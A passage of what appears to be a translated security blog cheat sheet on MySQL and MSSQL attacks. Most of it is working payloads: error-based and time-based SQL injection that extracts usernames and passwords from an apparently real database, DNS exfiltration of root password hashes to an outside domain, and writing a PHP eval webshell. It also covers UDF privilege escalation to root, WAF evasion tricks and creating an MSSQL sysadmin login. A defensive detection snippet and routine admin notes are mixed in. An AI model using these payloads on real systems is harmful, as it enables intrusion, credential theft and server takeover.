class="keyword">CAST</span>(cIpAddress <span class="keyword">AS</span> <span class="built_in">CHAR</span>),<span class="number">0x20</span>)),<span class="number">1</span>,<span class="number">50</span>) <span class="keyword">FROM</span> MTN2012.admin <span class="keyword">ORDER</span> <span class="keyword">BY</span> email <span class="keyword">LIMIT</span> <span class="number">1</span>,<span class="number">1</span>),<span class="number">0x7170626271</span>)) <span class="keyword">AND</span> (<span class="string">'JonM'</span>=<span class="string">'JonM</span></div></pre></td></tr></table></figure></p>
<p>// cut string<br>SELECT MID(ColumnName, Start [, Length])<br>CAST(value as type);<br>CHAR<br>SIGNED<br>CONVERT(value, type);<br>LIMIT 18,1 // ahmad</p>
<p>left('ruo',1) = 'r'<br>substr('ruo',1,1) = 'r'<br>ascii('r') = 114<br>mid('ruo',1,1) = 'r'</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div><div class="line">15</div><div class="line">16</div><div class="line">17</div><div class="line">18</div><div class="line">19</div><div class="line">20</div><div class="line">21</div><div class="line">22</div><div class="line">23</div><div class="line">24</div><div class="line">25</div><div class="line">26</div><div class="line">27</div><div class="line">28</div><div class="line">29</div><div class="line">30</div><div class="line">31</div><div class="line">32</div><div class="line">33</div><div class="line">34</div><div class="line">35</div><div class="line">36</div><div class="line">37</div><div class="line">38</div><div class="line">39</div><div class="line">40</div><div class="line">41</div><div class="line">42</div><div class="line">43</div><div class="line">44</div><div class="line">45</div><div class="line">46</div><div class="line">47</div><div class="line">48</div><div class="line">49</div><div class="line">50</div><div class="line">51</div><div class="line">52</div><div class="line">53</div><div class="line">54</div><div class="line">55</div><div class="line">56</div><div class="line">57</div><div class="line">58</div><div class="line">59</div><div class="line">60</div><div class="line">61</div><div class="line">62</div><div class="line">63</div><div class="line">64</div><div class="line">65</div><div class="line">66</div></pre></td><td class="code"><pre><div class="line">(<span class="keyword">SELECT</span> </div><div class="line"><span class="keyword">MID</span>((<span class="keyword">IFNULL</span>(<span class="keyword">CAST</span>(<span 
class="keyword">password</span> <span class="keyword">AS</span> <span class="built_in">CHAR</span>),<span class="number">0x20</span>)),<span class="number">1</span>,<span class="number">50</span>) </div><div class="line"><span class="keyword">FROM</span> MTN2012.<span class="string">`user`</span> <span class="keyword">LIMIT</span> <span class="number">3</span>,<span class="number">1</span>)</div><div class="line"></div><div class="line">lang=en<span class="string">') AND </span></div><div class="line"><span class="string">EXTRACTVALUE(4230,</span></div><div class="line"><span class="string">CONCAT(0x34,(SELECT MID((IFNULL(CAST(username AS CHAR),0x20)),1,50) FROM MTN2012.user ORDER BY id LIMIT 18,1))</span></div><div class="line"><span class="string">)</span></div><div class="line"><span class="string">AND ('</span>JonM<span class="string">'='</span>JonM;</div><div class="line"></div><div class="line">en') AND EXTRACTVALUE(4230,CONCAT(0x5c,0x716b787871,(<span class="keyword">SELECT</span> <span class="keyword">MID</span>((<span class="keyword">IFNULL</span>(<span class="keyword">CAST</span>(username <span class="keyword">AS</span> <span class="built_in">CHAR</span>),<span class="number">0x20</span>)),<span class="number">1</span>,<span class="number">50</span>) <span class="keyword">FROM</span> MTN2012.user <span class="keyword">limit</span> <span class="number">1</span>,<span class="number">1</span>),<span class="number">0x7170626271</span>)) <span class="keyword">AND</span> (<span class="string">'JonM'</span>=<span class="string">'JonM;</span></div><div class="line"><span class="string">en'</span>) <span class="keyword">AND</span> EXTRACTVALUE(<span class="number">4230</span>,<span class="keyword">CONCAT</span>(<span class="number">0x34</span>,(<span class="keyword">SELECT</span> <span class="keyword">MID</span>((<span class="keyword">IFNULL</span>(<span class="keyword">CAST</span>(username <span class="keyword">AS</span> <span class="built_in">CHAR</span>),<span 
class="number">0x20</span>)),<span class="number">1</span>,<span class="number">50</span>) <span class="keyword">FROM</span> MTN2012.user <span class="keyword">limit</span> <span class="number">1</span>,<span class="number">1</span>))) <span class="keyword">AND</span> (<span class="string">'JonM'</span>=<span class="string">'JonM;</span></div><div class="line"><span class="string">en'</span>) <span class="keyword">AND</span> EXTRACTVALUE(<span class="number">1</span>,(<span class="keyword">select</span> username <span class="keyword">FROM</span> MTN2012.user <span class="keyword">limit</span> <span class="number">1</span>,<span class="number">1</span>)) <span class="keyword">AND</span> (<span class="string">'JonM'</span>=<span class="string">'JonM;</span></div><div class="line"><span class="string"></span></div><div class="line"><span class="string">where username = 0x6261626e73696969</span></div><div class="line"><span class="string"></span></div><div class="line"><span class="string">098f6bcd4621d373cade4e832627b4f6</span></div><div class="line"><span class="string"></span></div><div class="line"><span class="string">select * from t where name = '</span>c<span class="string">' </span></div><div class="line"><span class="string">and extractvalue(1, </span></div><div class="line"><span class="string">(SELECT string FROM t limit 1,1)</span></div><div class="line"><span class="string">)</span></div><div class="line"><span class="string"></span></div><div class="line"><span class="string">select extractValue(1,(SELECT string FROM t limit 1,1))</span></div><div class="line"><span class="string">[Err] 1105 - XPATH syntax error: '</span>f6bcd4621d373cade4e832627b4f6<span class="string">'</span></div><div class="line"><span class="string"></span></div><div class="line"><span class="string">select extractValue(1,(SELECT concat(":",string) FROM t limit 1,1))</span></div><div class="line"><span class="string">[Err] 1105 - XPATH syntax error: '</span>:<span 
class="number">098</span>f6bcd4621d373cade4e832627b4f<span class="string">'</span></div><div class="line"><span class="string"></span></div><div class="line"><span class="string"></span></div><div class="line"><span class="string">floor</span></div><div class="line"><span class="string"></span></div><div class="line"><span class="string">select * from t where name = '</span>c<span class="string">' </span></div><div class="line"><span class="string">-- and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,table_name,0x7e) FROM information_schema.tables where table_schema=database() LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) </span></div><div class="line"><span class="string">-- and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,column_name,0x7e) FROM information_schema.columns where table_name=0x74 LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)</span></div><div class="line"><span class="string"></span></div><div class="line"><span class="string">/*</span></div><div class="line"><span class="string">and (select 1 from</span></div><div class="line"><span class="string">(</span></div><div class="line"><span class="string">select count(*),concat(</span></div><div class="line"><span class="string">(SELECT distinct concat(0x23,string) FROM t limit 2,1) -- #a:100684d61405e723#</span></div><div class="line"><span class="string">-- "hkruo"</span></div><div class="line"><span class="string">,floor(rand(0)*2))x from information_schema.tables group by x)a</span></div><div class="line"><span class="string">)</span></div><div class="line"><span class="string"></span></div><div class="line"><span class="string">*/</span></div><div class="line"><span class="string"></span></div><div class="line"><span class="string">and (select 1 from </span></div><div class="line"><span 
class="string">(</span></div><div class="line"><span class="string">select count(*),concat(</span></div><div class="line"><span class="string">(SELECT distinct concat(0x23,string) FROM t limit 2,1) -- #a:100684d61405e723#</span></div><div class="line"><span class="string">,floor(rand(0)*2))x </span></div><div class="line"><span class="string">from information_schema.tables group by x</span></div><div class="line"><span class="string">)b</span></div><div class="line"><span class="string">)</span></div><div class="line"><span class="string"></span></div><div class="line"><span class="string">and (select 1 from </span></div><div class="line"><span class="string">(</span></div><div class="line"><span class="string">select count(*),concat(</span></div><div class="line"><span class="string">(SELECT distinct concat(0x23,password) FROM admin limit 2,1)</span></div><div class="line"><span class="string">,floor(rand(0)*2))x </span></div><div class="line"><span class="string">from information_schema.tables group by x</span></div><div class="line"><span class="string">)b</span></div><div class="line"><span class="string">)</span></div><div class="line"><span class="string"></span></div><div class="line"><span class="string">en'</span>)+<span class="keyword">and</span>+(<span class="keyword">select</span> <span class="number">1</span> <span class="keyword">from</span> (<span class="keyword">select</span> <span class="keyword">count</span>(*),<span class="keyword">concat</span>((<span class="keyword">SELECT</span> <span class="keyword">distinct</span> <span class="keyword">concat</span>(<span class="number">0x23</span>,<span class="keyword">password</span>) <span class="keyword">FROM</span> <span class="keyword">admin</span> <span class="keyword">limit</span> <span class="number">2</span>,<span class="number">1</span>),<span class="keyword">floor</span>(<span class="keyword">rand</span>(<span class="number">0</span>)*<span class="number">2</span>))x <span 
class="keyword">from</span> information_schema.tables <span class="keyword">group</span> <span class="keyword">by</span> x)b) <span class="keyword">and</span> (<span class="string">'JonM'</span>=<span class="string">'JonM</span></div></pre></td></tr></table></figure>
<h3 id="延时注入"><a href="#延时注入" class="headerlink" title="延时注入"></a>Time-based injection</h3><p>Delay functions<br>Mysql BENCHMARK(100000,MD5(1)) or sleep(5)<br>Postgresql PG_SLEEP(5) OR GENERATE_SERIES(1,10000)<br>MSSQL WAITFOR DELAY '0:0:5'</p>
<p>Query to delay<br>select * from test.t where name = 'a'</p>
<p>Payload<br><figure class="highlight sql"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div></pre></td><td class="code"><pre><div class="line">' or If(substr('ruo',1,1) = 'r',sleep(5),0)</div><div class="line">' and if(true,sleep(5),0) # </div><div class="line">' union <span class="keyword">select</span> <span class="keyword">benchmark</span>(<span class="number">500000</span>,<span class="keyword">md5</span>(<span class="string">'test'</span>));</div></pre></td></tr></table></figure></p>
<h3 id="DNS传输数据"><a href="#DNS传输数据" class="headerlink" title="DNS传输数据"></a>Exfiltrating data over DNS</h3><p>Configure the domain<br>A test 153.92.xxx.xxx<br>NS ns1 test.domainname.com</p>
<p>Statement<br><figure class="highlight sql"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line"><span class="keyword">SELECT</span> <span class="keyword">LOAD_FILE</span>(<span class="keyword">CONCAT</span>(<span class="string">'\\\\'</span>,(<span class="keyword">SELECT</span> <span class="keyword">password</span> <span class="keyword">FROM</span> mysql.user <span class="keyword">WHERE</span> <span class="keyword">user</span>=<span class="string">'root'</span> <span class="keyword">LIMIT</span> <span class="number">1</span>),<span class="string">'.ns1.domainname.com\\foo'</span>));</div></pre></td></tr></table></figure></p>
<p>Test<br><figure class="highlight sql"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div></pre></td><td class="code"><pre><div class="line"><span class="keyword">select</span> * <span class="keyword">from</span> t <span class="keyword">WHERE</span> <span class="string">`name`</span> = <span class="string">'a'</span> </div><div class="line"><span class="keyword">or</span> <span class="keyword">if</span>((<span class="keyword">SELECT</span> <span class="keyword">LOAD_FILE</span>(<span class="keyword">CONCAT</span>(<span class="string">'\\\\'</span>,(<span class="keyword">SELECT</span> <span class="keyword">hex</span>(<span class="keyword">user</span>())),<span class="string">'.ns1.domainname.com\\foo'</span>))),<span class="number">1</span>,<span class="number">1</span>)</div></pre></td></tr></table></figure></p>
<p>Receive the data with dnschef<br><code>[22:29:07] 61.139.113.158: proxying the response of type 'A' for 726F6F74406C6F63616C686F7374.ns1.domain.com</code></p>
<blockquote>
<p>Note</p>
<ol>
<li>Consider the case where LOAD_FILE is disabled</li>
<li>The local DNS resolver cannot resolve the name</li>
</ol>
</blockquote>
<h3 id="文件操作"><a href="#文件操作" class="headerlink" title="文件操作"></a>File operations</h3><blockquote>
<p>When writing a file or a shell, some quote characters may cause errors, so consider converting the content to hex before writing it. If MySQL is configured with the --secure-file-priv parameter, use of LOAD DATA, SELECT ... OUTFILE and LOAD_FILE() is restricted.</p>
</blockquote>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div></pre></td><td class="code"><pre><div class="line"><span class="comment">/* Write a webshell */</span></div><div class="line"><span class="keyword">select</span> <span class="keyword">hex</span>(<span class="string">'<?php eval($_POST[ru0]);phpinfo();?>'</span>)</div><div class="line"><span class="keyword">select</span> <span class="number">0x3C3F706870206576616C28245F504F53545B7275305D293B706870696E666F28293B3F3E</span> <span class="keyword">into</span> <span class="keyword">outfile</span> <span class="string">'D:/r1.php'</span></div><div class="line"></div><div class="line"><span class="comment">/* Decode hex data back to the string /etc/passwd */</span></div><div class="line"><span class="keyword">select</span> <span class="keyword">unhex</span>(<span class="string">'2F6574632F706173737764'</span>);</div><div class="line"></div><div class="line"><span class="comment">/* Save a file's hex data to a text file */</span></div><div class="line"><span class="keyword">select</span> <span class="keyword">hex</span>(<span class="keyword">load_file</span>(<span class="string">'D:/Test/setup.exe'</span>)) <span class="keyword">into</span> <span class="keyword">outfile</span> <span class="string">'D:/Test/hex16f.txt'</span>;</div><div class="line"></div><div class="line"><span class="comment">/* Export as a binary file */</span></div><div class="line"><span class="keyword">select</span> <span class="number">0x4D5A90000300000004000000</span><span class="comment">/* hex data */</span> <span class="keyword">into</span> <span class="keyword">dumpfile</span> <span class="string">'D:/Test/file.exe'</span>;</div></pre></td></tr></table></figure>
<blockquote>
<p>Note</p>
<ol>
<li>When writing a program converted to hex back into a file, use INTO DUMPFILE, not INTO OUTFILE.</li>
<li>When exporting, do not forget the 0x prefix at the start of the string.</li>
</ol>
</blockquote>
<h3 id="UDF"><a href="#UDF" class="headerlink" title="UDF"></a>UDF</h3><p>Linux:<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div><div class="line">15</div><div class="line">16</div><div class="line">17</div><div class="line">18</div><div class="line">19</div><div class="line">20</div><div class="line">21</div><div class="line">22</div><div class="line">23</div></pre></td><td class="code"><pre><div class="line">$ id</div><div class="line">uid=500(raptor) gid=500(raptor) groups=500(raptor)</div><div class="line">$ gcc -g -c raptor_udf2.c</div><div class="line">$ gcc -g -shared -W1,-soname,raptor_udf2.so -o raptor_udf2.so raptor_udf2.o -lc</div><div class="line">$ mysql -u root -p</div><div class="line">Enter password:</div><div class="line">[...]</div><div class="line">mysql> use mysql;</div><div class="line">mysql> create table foo(line blob);</div><div class="line">mysql> insert into foo values(load_file('/home/raptor/raptor_udf2.so'));</div><div class="line">mysql> select * from foo into dumpfile '/usr/lib/raptor_udf2.so';</div><div class="line">mysql> create function do_system returns integer soname 'raptor_udf2.so';</div><div class="line">mysql> select * from mysql.func;</div><div class="line">+-----------+-----+----------------+----------+</div><div class="line">| name | ret | dl | type |</div><div class="line">+-----------+-----+----------------+----------+</div><div class="line">| do_system | 2 | raptor_udf2.so | function |</div><div class="line">+-----------+-----+----------------+----------+</div><div class="line">mysql> select do_system('id > /tmp/out; chown raptor.raptor 
/tmp/out');</div><div class="line">mysql> \! sh</div><div class="line">sh-2.05b$ cat /tmp/out</div><div class="line">uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm)</div><div class="line">[...]</div></pre></td></tr></table></figure></p>
<p>Windows:</p>
<p>S1. Compile the UDF</p>
<p>UDF source code<br><a href="http://www.mysqludf.org/" target="_blank" rel="external">http://www.mysqludf.org/</a><br><a href="https://github.com/sqlmapproject/udfhack" target="_blank" rel="external">https://github.com/sqlmapproject/udfhack</a></p>
<p>Build the 32-bit version<br>MYSQL: 4.1.22<br>Header files used for compiling: mysql-4.1.22-win32\include</p>
<p>Put lib_mysqludf_sys.dll in the c:\windows directory; on newer versions put it in the plugin directory (there is a bug: some commands will crash the MySQL process).</p>
<blockquote>
<p>Important<br>The UDF file location and the trick of creating the plugin directory through an NTFS stream type (select 'xxx' into dumpfile 'C:\WINDOWS\TEMP\plugin::$INDEX_ALLOCATION';) must be tested against the specific target version.</p>
</blockquote>
<p>S2. Create the function</p>
<p>Check the version<br>select version();</p>
<p>Check the plugin directory path<br>SHOW VARIABLES LIKE '%plugin%'</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div></pre></td><td class="code"><pre><div class="line">mysql>use mysql;</div><div class="line">mysql>CREATE FUNCTION sys_exec RETURNS string SONAME <span class="string">'lib_mysqludf_sys.dll'</span>;</div><div class="line">mysql>SELECT * from mysql.func;</div><div class="line">+----------+-----+-----------------------+----------+</div><div class="line">| name | ret | dl | <span class="built_in">type</span> |</div><div class="line">+----------+-----+-----------------------+----------+</div><div class="line">| sys_exec | 0 | lib_mysqludf_sys1.dll | <span class="keyword">function</span> |</div><div class="line">+----------+-----+-----------------------+----------+</div><div class="line">mysql>SELECT sys_exec(<span class="string">'whoami > d:/11.txt'</span>);</div><div class="line">mysql>DROP FUNCTION sys_exec;</div></pre></td></tr></table></figure>
<h3 id="MYSQL-FEDERATED"><a href="#MYSQL-FEDERATED" class="headerlink" title="MYSQL FEDERATED"></a>MYSQL FEDERATED</h3><p>The FEDERATED storage engine lets you access data from a remote MySQL database without using replication or cluster technology. The FEDERATED storage engine is not enabled by default in the running server; to enable FEDERATED, you must start the MySQL server binary using the --federated option.</p>
<p><img src="https://i.imgur.com/gDDme2b.png" alt=""></p>
<p>Create FEDERATED Tables</p>
<p>ST1</p>
<ol>
<li>Create the remote table<figure class="highlight sql"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div></pre></td><td class="code"><pre><div class="line"><span class="keyword">CREATE</span> <span class="keyword">TABLE</span> <span class="string">`T1`</span>(</div><div class="line"><span class="keyword">id</span> <span class="built_in">INT</span>(<span class="number">20</span>) <span class="keyword">NOT</span> <span class="literal">NULL</span> AUTO_INCREMENT,</div><div class="line"><span class="string">`name`</span> <span class="built_in">VARCHAR</span>(<span class="number">100</span>),</div><div class="line">PRIMARY <span class="keyword">KEY</span> (<span class="keyword">id</span>)</div><div class="line">)</div><div class="line"><span class="keyword">ENGINE</span>=MYISAM;</div></pre></td></tr></table></figure>
</li>
</ol>
<p>ST2</p>
<ol>
<li><p>Enable the federated storage engine in my.ini</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div></pre></td><td class="code"><pre><div class="line">[mysqld]</div><div class="line">federated</div></pre></td></tr></table></figure>
</li>
<li><p>Create the FEDERATED table with CONNECTION</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div></pre></td><td class="code"><pre><div class="line"><span class="keyword">CREATE</span> <span class="keyword">TABLE</span> <span class="string">`T1_FEDERATED`</span>(</div><div class="line"><span class="keyword">id</span> <span class="built_in">INT</span>(<span class="number">20</span>) <span class="keyword">NOT</span> <span class="literal">NULL</span> AUTO_INCREMENT,</div><div class="line"><span class="string">`name`</span> <span class="built_in">VARCHAR</span>(<span class="number">100</span>),</div><div class="line">PRIMARY <span class="keyword">KEY</span> (<span class="keyword">id</span>)</div><div class="line">)</div><div class="line"><span class="keyword">ENGINE</span>=FEDERATED</div><div class="line"><span class="keyword">CONNECTION</span>=<span class="string">'mysql://root:password@127.0.0.1:3306/test/T1'</span>;</div></pre></td></tr></table></figure>
</li>
</ol>
<blockquote>
<p>Note<br>The remote server must be a MySQL server.<br>Care should be taken when creating a FEDERATED table since the index definition from an equivalent MyISAM or other table may not be supported.</p>
</blockquote>
<p>How to attack?<br>With the engine enabled, other local tables can be reached through another user's credentials.</p>
<h3 id="Restoring-Orphan-File-Per-Table-ibd-Files"><a href="#Restoring-Orphan-File-Per-Table-ibd-Files" class="headerlink" title="Restoring Orphan File-Per-Table ibd Files"></a>Restoring Orphan File-Per-Table ibd Files</h3><p>Recovering a database when only the .frm and .ibd files are available (file-per-table tablespaces, innodb_file_per_table=1). First make sure the current server and the database to be recovered are the same version!</p>
<p>ST1</p>
<ol>
<li>Get the table structure<br>Create a database with the same name<br>mysql> CREATE DATABASE dbname;</li>
<li>Copy the .frm file into the corresponding database directory</li>
<li>Show the table structure<br>mysql> SHOW CREATE TABLE tbname;</li>
</ol>
<blockquote>
<p>Note<br>Method 2 for recovering the table structure (recommended)<br>MySQL Utilities<br><a href="https://dev.mysql.com/downloads/utilities/" target="_blank" rel="external">https://dev.mysql.com/downloads/utilities/</a><br>$ mysqlfrm --basedir=/usr/local/bin/mysql test1:db1.frm --port=3333</p>
</blockquote>
<p>ST2</p>
<ol>
<li>Create the table structure using the exported statement</li>
<li>Discard the current tablespace<br>mysql> ALTER TABLE dbname.tbname DISCARD TABLESPACE;</li>
<li>Copy the .ibd file to be recovered into the new database directory (on Linux make sure the .ibd file has suitable permissions)</li>
<li>Import the .ibd file<br>mysql> ALTER TABLE dbname.tbname IMPORT TABLESPACE; SHOW WARNINGS;</li>
</ol>
<h3 id="绕过WAF"><a href="#绕过WAF" class="headerlink" title="绕过WAF"></a>Bypassing the WAF</h3><p>WAF interception flow<br>Data normalization -> rule matching</p>
<p>Case variation: union -> UnIon<br>Deletion-based filtering: union -> unioUNIONn<br><> is equivalent to BETWEEN<br>= is equivalent to like<br>Hex(), bin() are equivalent to ascii()<br>Sleep() is equivalent to benchmark()<br>Mid(), substring() are equivalent to substr()<br>@@user is equivalent to User()<br>@@Version is equivalent to version()<br>MySQL supports &&, ||<br><code>+</code> the plus sign acts as a space<br><code>/*Comments*/</code> a comment acts as a space<br><code>CONCAT/*Comments*/('a','test');</code> // special characters may appear between a function name and its left parenthesis<br><code>where name = 8E0union select 'test'</code> // 8.0union select 'test' does not get past the regex union\sselect<br><code>UNION/*!12345select all*/1,2</code> // union all select 1,2<br>?<br>` acts as a comment<br>union%250Cselect %250C whitespace character<br>union%25A0select<br>MySQL ignores unknown encodings</p>
<blockquote>
<p>Note<br>Use the log to see which statements MySQL actually executed<br>Enable logging in my.ini<br>[mysqld]<br>log = mysql.log<br>or<br>set global general_log=1;</p>
</blockquote>
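<p>The "data normalization -> rule matching" flow above seen from the WAF's side, as an added example that is not from the original post: it undoes the listed evasions (double URL-encoding, exotic whitespace, versioned and ordinary comments, numeric literals glued to keywords, case) before matching, and its rules also flag the statement shapes the general log note would reveal (time-based, error-based, file write, LOAD_FILE, UDF creation, MSSQL extended procedures). The rule names and the sample inputs are my own constructions.</p>

```python
"""Normalize a statement before rule matching, then classify it.
Added example; rule names, thresholds and samples are constructed."""
import re
from urllib.parse import unquote_plus

# Detection rules applied to the normalized (lower-cased) statement.
RULES = {
    "union_select": re.compile(r"union\s+(?:all\s+|distinct\s+)?select"),
    "time_based":   re.compile(r"\b(?:sleep|benchmark)\s*\("),
    "error_based":  re.compile(r"\b(?:extractvalue|updatexml)\s*\("),
    "file_write":   re.compile(r"\binto\s+(?:out|dump)file\b"),
    "file_read":    re.compile(r"\bload_file\s*\("),
    "udf_create":   re.compile(r"\bcreate\s+function\s+\w+\s+returns\s+\w+\s+soname\b"),
    "mssql_xp":     re.compile(r"\b(?:xp_cmdshell|xp_dirtree|sp_configure)\b"),
}

def normalize_sql(raw: str) -> str:
    """Undo the evasions listed in the WAF section so rules see one canonical form."""
    s = raw
    # 1. Repeated URL-decoding: %250C -> %0C -> form feed, %25A0 -> %A0 -> no-break space.
    #    unquote_plus also turns '+' into a space ("+ acts as a space").
    for _ in range(3):
        decoded = unquote_plus(s, encoding="latin-1")
        if decoded == s:
            break
        s = decoded
    # 2. Versioned comments /*!12345 ... */ are executed by MySQL: keep their body.
    s = re.sub(r"/\*!\d*\s*(.*?)\*/", r" \1 ", s, flags=re.S)
    # 3. Ordinary comments act as whitespace: CONCAT/*x*/( -> CONCAT (
    s = re.sub(r"/\*.*?\*/", " ", s, flags=re.S)
    # 4. Split a numeric literal glued to a keyword: 8E0union -> 8E0 union
    #    (hex literals such as 0x7e are left alone).
    s = re.sub(r"(?<![0-9A-Za-z_])(\d+(?:\.\d+)?(?:[eE]\d+)?)(?!x)(?=[A-Za-z_])", r"\1 ", s)
    # 5. Collapse control characters and exotic whitespace to one space, fold case.
    s = re.sub(r"[\s\x00-\x20\xa0]+", " ", s)
    return s.strip().lower()

def classify(raw: str) -> list:
    """Names of the rules that fire on the normalized statement, in RULES order."""
    norm = normalize_sql(raw)
    return [name for name, rx in RULES.items() if rx.search(norm)]

# Constructed samples; the first five are the evasions from the list above.
SAMPLES = [
    "' and if(true,sleep(5),0) # ",
    "UNION/*!12345select all*/1,2",
    "where name = 8E0union select 'test'",
    "union%250Cselect",
    "union%25A0select",
    "create function do_system returns integer soname 'raptor_udf2.so'",
    "select 0x41 into outfile '/tmp/x.txt'",
    "select id,name from t where name = 'a'",
]

if __name__ == "__main__":
    for sample in SAMPLES:
        print(f"{classify(sample)!s:20} {normalize_sql(sample)}")
```

Deleting matched keywords (the unioUNIONn case) is deliberately not part of the normalizer: a WAF that deletes rather than blocks hands the attacker the reassembly.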
<h3 id="存储过程"><a href="#存储过程" class="headerlink" title="存储过程"></a>Stored procedures</h3><figure class="highlight sql"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div><div class="line">15</div><div class="line">16</div></pre></td><td class="code"><pre><div class="line"><span class="keyword">use</span> <span class="keyword">test</span>;</div><div class="line"><span class="keyword">DROP</span> <span class="keyword">PROCEDURE</span> <span class="keyword">IF</span> <span class="keyword">EXISTS</span> <span class="keyword">test</span>;</div><div class="line"><span class="keyword">CREATE</span> <span class="keyword">PROCEDURE</span> <span class="keyword">test</span>()</div><div class="line"><span class="keyword">BEGIN</span></div><div class="line"> <span class="keyword">DECLARE</span> i <span class="built_in">INT</span> <span class="keyword">DEFAULT</span> <span class="number">1</span>;</div><div class="line"> #SET i=1;</div><div class="line"> WHILE i < 3608 DO</div><div class="line"> #CREATE TABLE ti(id int) ENGINE=InnoDB;</div><div class="line"> <span class="keyword">set</span> @sql_create_table = <span class="keyword">concat</span>(<span class="string">'CREATE TABLE IF NOT EXISTS tb_'</span>,i,<span class="string">'(id int) ENGINE=InnoDB'</span>);</div><div class="line"> <span class="keyword">PREPARE</span> sql_create_table <span class="keyword">FROM</span> @sql_create_table;</div><div class="line"> <span class="keyword">EXECUTE</span> sql_create_table;</div><div class="line"> <span class="keyword">SET</span> i=i+<span class="number">1</span>;</div><div class="line"> <span class="keyword">END</span> <span class="keyword">WHILE</span>;</div><div class="line"><span class="keyword">END</span>;</div><div class="line"></div><div class="line"><span class="keyword">CALL</span> <span class="keyword">test</span>()</div></pre></td></tr></table></figure>
<h3 id="备份还原"><a href="#备份还原" class="headerlink" title="备份还原"></a>Backup and restore</h3><p>Dump to a SQL file</p>
<p>mysqldump -h ip -uroot -pPassword dbname table1 table2 > backup.sql</p>
<p>mysqlhotcopy</p>
<p>Restore</p>
<p>mysql -u root -pPassword dbname < backup.sql</p>
<blockquote>
<p>Note<br>If syntax errors or similar problems appear, raise the maximum packet size parameter<br>mysql> set global max_allowed_packet=268435456;</p>
</blockquote>
<h2 id="MSSQL"><a href="#MSSQL" class="headerlink" title="MSSQL"></a>MSSQL</h2><h3 id="常用语句"><a href="#常用语句" class="headerlink" title="常用语句"></a>Common statements</h3><p>Get the database file paths</p>
<p><code>select database_id,name,physical_name AS CurrentLocation,state_desc,size from sys.master_files where database_id=db_id(N'wx');</code> </p>
<p>Current database name: db_name()<br>Current user: user<br>Server name: @@SERVERNAME</p>
<p>Database name</p>
<p>select name from master.dbo.sysdatabases where dbid=1</p>
<p>List table names</p>
<p>select top 1 name from 库名.dbo.sysobjects where xtype='U'</p>
<p>Get the id of a table</p>
<p>select id from sl.dbo.sysobjects where xtype='U' and name='users'</p>
<p>Query column names by table id</p>
<p>select name from sl.dbo.syscolumns where id=1937441976</p>
<p>Add a login and server role</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div></pre></td><td class="code"><pre><div class="line"><span class="keyword">CREATE</span> LOGIN ruo <span class="keyword">WITH</span> <span class="keyword">PASSWORD</span> = <span class="string">'123456'</span>;</div><div class="line">EXEC sp_addsrvrolemember 'ruo', 'sysadmin'</div></pre></td></tr></table></figure>
<p>Common functions</p>
<p>COL_NAME ( table_id , column_id )<br>IS_SRVROLEMEMBER ('sysadmin')<br>IS_MEMBER ('db_owner')<br>EXISTS/NOT EXISTS<br>IN/NOT IN</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div></pre></td><td class="code"><pre><div class="line"><span class="comment">-- enumerate table names</span></div><div class="line"><span class="keyword">SELECT</span> TOP <span class="number">1</span> <span class="keyword">name</span> <span class="keyword">FROM</span> sl.dbo.sysobjects <span class="keyword">WHERE</span> xtype=<span class="string">'U'</span> </div><div class="line"> <span class="keyword">AND</span> <span class="keyword">NAME</span> <span class="keyword">NOT</span> <span class="keyword">IN</span> (<span class="keyword">SELECT</span> TOP N <span class="keyword">NAME</span> <span class="keyword">FROM</span> sl.dbo.sysobjects <span class="keyword">WHERE</span> xtype=<span class="string">'U'</span>)</div></pre></td></tr></table></figure>
